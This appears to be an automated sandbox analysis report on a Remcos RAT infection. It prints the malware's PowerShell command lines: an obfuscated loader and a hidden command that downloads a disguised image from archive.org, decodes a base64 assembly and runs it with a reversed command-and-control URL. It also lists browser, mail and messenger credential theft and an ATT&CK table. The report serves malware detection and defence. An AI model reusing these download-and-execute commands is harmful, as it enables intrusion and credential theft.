                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.recsrn/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
                Source: RegAsm.exe, 00000011.00000002.624344348.0000000000876000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434CB6 cpuid 17_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,17_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,17_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,17_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,17_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,17_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,17_2_00451FD0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004489D7 GetSystemTimeAsFileTime,17_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B69E GetComputerNameExW,GetUserNameW,17_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041739B GetVersionExW,21_2_0041739B
                Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040BA4D
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db17_2_0040BB6B
                Searches for Windows Mail specific files
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword23_2_004033F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword23_2_00402DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword23_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2080, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-GT4655Jump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe17_2_0040569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting                		Valid Accounts11
                Native API                		121
                Scripting                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		13
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts23
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                Bypass User Account Control                		21
                Obfuscated Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts223
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Access Token Manipulation                		1
                Install Root Certificate                		2
                Credentials in Registry                		1
                System Service Discovery                		SMB/Windows Admin Shares21
                Email Collection                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		1
                DLL Side-Loading                		3
                Credentials In Files                		4
                File and Directory Discovery                		Distributed Component Object Model111
                Input Capture                		2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts4
                PowerShell                		Network Logon Script422
                Process Injection                		1
                Bypass User Account Control                		LSA Secrets39
                System Information Discovery                		SSH4
